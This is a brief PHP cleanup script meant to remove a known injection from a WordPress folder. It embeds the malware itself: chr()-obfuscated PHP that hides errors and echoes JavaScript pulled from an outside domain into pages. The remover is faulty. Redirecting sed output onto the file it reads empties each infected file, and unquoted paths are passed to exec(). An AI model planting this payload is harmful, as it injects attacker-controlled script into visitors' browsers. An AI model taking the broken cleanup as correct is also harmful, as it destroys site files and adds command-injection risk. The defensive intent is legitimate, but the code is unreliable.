<?php$folder = "./somewordpress/";$output = [];$infection = escapeshellcmd("

1. <?php
2. $folder = "./somewordpress/";
3. $output = [];
4.  
5. $infection = escapeshellcmd("<?php error_reporting(0); ini_set(chr(100).chr(105).chr(115).chr(112).chr(108).chr(97).chr(121).chr(95).chr(101).chr(114).chr(114).chr(111).chr(114).chr(115), 0); echo @file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(97).chr(108).chr(115).chr(117).chr(116).chr(114).chr(97).chr(110).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(115).chr(116).chr(97).chr(116).chr(115).chr(46).chr(106).chr(115)); ?>");
6.  
7. echo "<pre>";
8. echo "** Starting analysis and fixing of $folder **\n";
9. exec("grep -rl '@file_get_contents(chr(104)' $folder", $output);
10. foreach ($output as $key => $filepath) {
11. echo "$filepath\n";
12. exec("sed 's/$infection//g' $filepath > $filepath");
13. }
14. echo ("</pre>");